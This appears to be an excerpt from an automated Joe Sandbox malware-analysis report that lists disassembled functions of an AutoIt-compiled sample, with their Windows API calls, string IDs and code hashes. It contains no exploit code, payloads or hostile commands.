                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 4f1fafa2fdb85ef52d2d8ac6003aa15cc714ae9709f2cb8ba7c53996703c0ee8
                                                                  • Instruction ID: 21c2361a0e910bcd0a6eb177ea0a0a775b97ec5ecb5009effba8e5dcffcd6131
                                                                  • Opcode Fuzzy Hash: 4f1fafa2fdb85ef52d2d8ac6003aa15cc714ae9709f2cb8ba7c53996703c0ee8
                                                                  • Instruction Fuzzy Hash: 57513B71901218BFDB129FA8EC48EEE7B7DEF09324F114516FA15AB2A1D7719A40CF90
                                                                  Function 003BB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003BB7B0
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003BB7C1
                                                                  • CharNextW.USER32(0000014E), ref: 003BB7F0
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003BB831
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003BB847
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003BB858
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003BB875
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 003BB8C7
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003BB8DD
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 003BB90E
                                                                  • _memset.LIBCMT ref: 003BB933
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003BB97C
                                                                  • _memset.LIBCMT ref: 003BB9DB
                                                                  • SendMessageW.USER32 ref: 003BBA05
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 003BBA5D
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 003BBB0A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 003BBB2C
                                                                  • GetMenuItemInfoW.USER32(?), ref: 003BBB76
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003BBBA3
                                                                  • DrawMenuBar.USER32(?), ref: 003BBBB2
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 003BBBDA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: 5b204780ab0e4e94c2bddcaf7d390230bcc0b1360fa31097f1215dd189745f1f
                                                                  • Instruction ID: 519f01beee1ae7c56e5ba6694a3e8b32096e05673955c8ae45b1787dcfc9dcb0
                                                                  • Opcode Fuzzy Hash: 5b204780ab0e4e94c2bddcaf7d390230bcc0b1360fa31097f1215dd189745f1f
                                                                  • Instruction Fuzzy Hash: 77E17171900218AFDB22DF65DC85EEEBB7CFF05718F108156FA19AA590DBB48A41CF60
                                                                  Function 00352EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Foreground
                                                                  • String ID: ACTIVE$ALL$CLASS$H+@$HANDLE$INSTANCE$L+@$LAST$P+@$REGEXPCLASS$REGEXPTITLE$T+@$TITLE
                                                                  • API String ID: 62970417-1725029583
                                                                  • Opcode ID: 5d6dae92c1cdda38efe5feaa1dad465616ec026e312e9fc492a1a5d6d1d50bbf
                                                                  • Instruction ID: c3c1b93ca8ed39a3c62952f950b77c39c2f8dee436aa517c2d447beb6eb91efc
                                                                  • Opcode Fuzzy Hash: 5d6dae92c1cdda38efe5feaa1dad465616ec026e312e9fc492a1a5d6d1d50bbf
                                                                  • Instruction Fuzzy Hash: 40D1A4301086429FCB06EF10C981E9BBBB4BF54344F508A1DF856AB5A1DB74ED9ECB91
                                                                  Function 003B764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 003B778A
                                                                  • GetDesktopWindow.USER32 ref: 003B779F
                                                                  • GetWindowRect.USER32(00000000), ref: 003B77A6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003B7808
                                                                  • DestroyWindow.USER32(?), ref: 003B7834
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003B785D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003B787B
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003B78A1
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 003B78B6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003B78C9
                                                                  • IsWindowVisible.USER32(?), ref: 003B78E9
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003B7904
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003B7918
                                                                  • GetWindowRect.USER32(?,?), ref: 003B7930
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 003B7956
                                                                  • GetMonitorInfoW.USER32 ref: 003B7970
                                                                  • CopyRect.USER32(?,?), ref: 003B7987
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 003B79F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: efd6a20a14ec0af94de28397cdc0489afa5ba1e882bc313db7a16e3a0e6de67d
                                                                  • Instruction ID: dda1dc8b41879771e5a64d2f2bd0357709afb3cbcfa886e0315fde4840ec6e74
                                                                  • Opcode Fuzzy Hash: efd6a20a14ec0af94de28397cdc0489afa5ba1e882bc313db7a16e3a0e6de67d
                                                                  • Instruction Fuzzy Hash: FAB1A271608300AFD715DF64D949BAABBE5FF88314F00891DF6999B2A1DB70EC05CB92
                                                                  Function 00396CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00396CFB
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00396D21
                                                                  • _wcscpy.LIBCMT ref: 00396D4F
                                                                  • _wcscmp.LIBCMT ref: 00396D5A
                                                                  • _wcscat.LIBCMT ref: 00396D70
                                                                  • _wcsstr.LIBCMT ref: 00396D7B
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00396D97
                                                                  • _wcscat.LIBCMT ref: 00396DE0
                                                                  • _wcscat.LIBCMT ref: 00396DE7
                                                                  • _wcsncpy.LIBCMT ref: 00396E12
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: a01e85b9c760cb393c4de5cefd70b5583c5780eec21eaad7e8c0a680ea57bca4
                                                                  • Instruction ID: 331d94ca7f73496ee206e7548202c0fd31d7809ee7b57c1ca98a179adfbf3486
                                                                  • Opcode Fuzzy Hash: a01e85b9c760cb393c4de5cefd70b5583c5780eec21eaad7e8c0a680ea57bca4
                                                                  • Instruction Fuzzy Hash: EC412772A01201BFEB17AB74DD43EBF777CDF41710F10406AF905AA182EB78EA0096A5
                                                                  Function 0036A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0036A939
                                                                  • GetSystemMetrics.USER32(00000007), ref: 0036A941
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0036A96C
                                                                  • GetSystemMetrics.USER32(00000008), ref: 0036A974
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0036A999
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0036A9B6
                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0036A9C6
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0036A9F9
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0036AA0D
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0036AA2B
                                                                  • GetStockObject.GDI32(00000011), ref: 0036AA47
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0036AA52
                                                                    • Part of subcall function 0036B63C: GetCursorPos.USER32(000000FF), ref: 0036B64F
                                                                    • Part of subcall function 0036B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0036B66C
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000001), ref: 0036B691
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000002), ref: 0036B69F
                                                                  • SetTimer.USER32(00000000,00000000,00000028,0036AB87), ref: 0036AA79
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI$ICTRLCREATETREEVIEW
                                                                  • API String ID: 1458621304-2913072300
                                                                  • Opcode ID: 2f9372624be25691f8a8fd09881c6f2252b38be88a3d9119418bbf13daedc5a8
                                                                  • Instruction ID: 7d2280fc50236aa60523dc061fe6ffb5fbcf30b2ab71ecff7e5b94bcc33232e3
                                                                  • Opcode Fuzzy Hash: 2f9372624be25691f8a8fd09881c6f2252b38be88a3d9119418bbf13daedc5a8
                                                                  • Instruction Fuzzy Hash: E2B14B75A0020AAFDB16DFA8DC45BED7BB8FB08314F11812AFA15A72A4DB749840CF55
                                                                  Function 003B3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B3735
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,003EDC00,00000000,?,00000000,?,?), ref: 003B37A3
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003B37EB
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003B3874
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003B3B94
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B3BA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: 17259cf6dd74f6d0ac96df6a4a7d796184e852415bbdce7559cd20b4e0d35a1e
                                                                  • Instruction ID: c58ffd478d97c0ef38cce49af460565408ee44d04cd0d0fe0f533678f39a9380
                                                                  • Opcode Fuzzy Hash: 17259cf6dd74f6d0ac96df6a4a7d796184e852415bbdce7559cd20b4e0d35a1e
                                                                  • Instruction Fuzzy Hash: D4026775204611DFCB16EF24C891E6AB7E9FF88724F05845DF98A9B2A1CB30ED05CB85
                                                                  Function 003B6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 003B6C56
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003B6D16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 3974292440-719923060
                                                                  • Opcode ID: 5458e7913af449a3161195f08952ad15069aaa9cae6d1fa76d892f2e1c19ac3a
                                                                  • Instruction ID: 9806afade59ca0ddc253778bd1e8c8b0eb43003a11a7ce55d4ad2d8b3f0ff5d7
                                                                  • Opcode Fuzzy Hash: 5458e7913af449a3161195f08952ad15069aaa9cae6d1fa76d892f2e1c19ac3a
                                                                  • Instruction Fuzzy Hash: 49A18F742043419FCB16EF24C952AAAB3A5BF84318F10896DB9565FBE2DB34EC09CB45
                                                                  Function 0038CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0038CF91
                                                                  • __swprintf.LIBCMT ref: 0038D032
                                                                  • _wcscmp.LIBCMT ref: 0038D045
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0038D09A
                                                                  • _wcscmp.LIBCMT ref: 0038D0D6
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0038D10D
                                                                  • GetDlgCtrlID.USER32(?), ref: 0038D15F
                                                                  • GetWindowRect.USER32(?,?), ref: 0038D195
                                                                  • GetParent.USER32(?), ref: 0038D1B3
                                                                  • ScreenToClient.USER32(00000000), ref: 0038D1BA
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0038D234
                                                                  • _wcscmp.LIBCMT ref: 0038D248
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0038D26E
                                                                  • _wcscmp.LIBCMT ref: 0038D282
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                  • String ID: %s%u
                                                                  • API String ID: 3119225716-679674701
                                                                  • Opcode ID: b7bfd047581a9d66402e12963acff55c8174e632216ff2fa86094cf0ef2b4b71
                                                                  • Instruction ID: a89f6a75e2214e6c25ea05c664d56a1c2230234f11e4142bab18b74af368502e
                                                                  • Opcode Fuzzy Hash: b7bfd047581a9d66402e12963acff55c8174e632216ff2fa86094cf0ef2b4b71
                                                                  • Instruction Fuzzy Hash: 99A1F371604302AFDB16EF64C884FAAB7ACFF44314F00895AF999D7190DB30EA55CBA1
                                                                  Function 0038D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0038D8EB
                                                                  • _wcscmp.LIBCMT ref: 0038D8FC
                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0038D924
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0038D941
                                                                  • _wcscmp.LIBCMT ref: 0038D95F
                                                                  • _wcsstr.LIBCMT ref: 0038D970
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0038D9A8
                                                                  • _wcscmp.LIBCMT ref: 0038D9B8
                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0038D9DF
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0038DA28
                                                                  • _wcscmp.LIBCMT ref: 0038DA38
                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0038DA60
                                                                  • GetWindowRect.USER32(00000004,?), ref: 0038DAC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                  • String ID: @$ThumbnailClass
                                                                  • API String ID: 1788623398-1539354611
                                                                  • Opcode ID: 1914d0810d97d40990fabacb4a5942b191d4b13604d52c3b6d89037e0cf18574
                                                                  • Instruction ID: 2df86522d7ff74f5c6cef8b111ed047aa7360e8c02e71c1845b4815bc66b2673
                                                                  • Opcode Fuzzy Hash: 1914d0810d97d40990fabacb4a5942b191d4b13604d52c3b6d89037e0cf18574
                                                                  • Instruction Fuzzy Hash: 9681C0310083059BDB17EF14C885FAA7BE8EF44714F1584AAFD8A9A0D6DB34DE45CBA1
                                                                  Function 0038D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                  • API String ID: 1038674560-1810252412
                                                                  • Opcode ID: eaaff5f913a49219ce0991c0b45a3311a13f959469474167f178e0614dbf8e5e
                                                                  • Instruction ID: 36caa385072c5addd0afb6b34cf1a7d2849ae85bad390b180a3b02a13e879ceb
                                                                  • Opcode Fuzzy Hash: eaaff5f913a49219ce0991c0b45a3311a13f959469474167f178e0614dbf8e5e
                                                                  • Instruction Fuzzy Hash: 84317C31A44305AADB26FE50DE57FAD73789F20701F7000AAF841790E5EBA5AF08C759
                                                                  Function 0038EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000063), ref: 0038EAB0
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0038EAC2
                                                                  • SetWindowTextW.USER32(?,?), ref: 0038EAD9
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0038EAEE
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0038EAF4
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0038EB04
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0038EB0A
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0038EB2B
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0038EB45
                                                                  • GetWindowRect.USER32(?,?), ref: 0038EB4E
                                                                  • SetWindowTextW.USER32(?,?), ref: 0038EBB9
                                                                  • GetDesktopWindow.USER32 ref: 0038EBBF
                                                                  • GetWindowRect.USER32(00000000), ref: 0038EBC6
                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0038EC12
                                                                  • GetClientRect.USER32(?,?), ref: 0038EC1F
                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0038EC44
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0038EC6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: bdf6d04efe2fd36eca2db48507d38e56877e59c180dd233fb68cc7634320f606
                                                                  • Instruction ID: f59c60c6111f830db6c8a0678f8400f03a0aa56959db0ddf95ac06f8e9c0a933
                                                                  • Opcode Fuzzy Hash: bdf6d04efe2fd36eca2db48507d38e56877e59c180dd233fb68cc7634320f606
                                                                  • Instruction Fuzzy Hash: C7516D71900709AFDB22EFA8DD89F6EBBF9FF04704F004969E596A25A0C774E904CB50
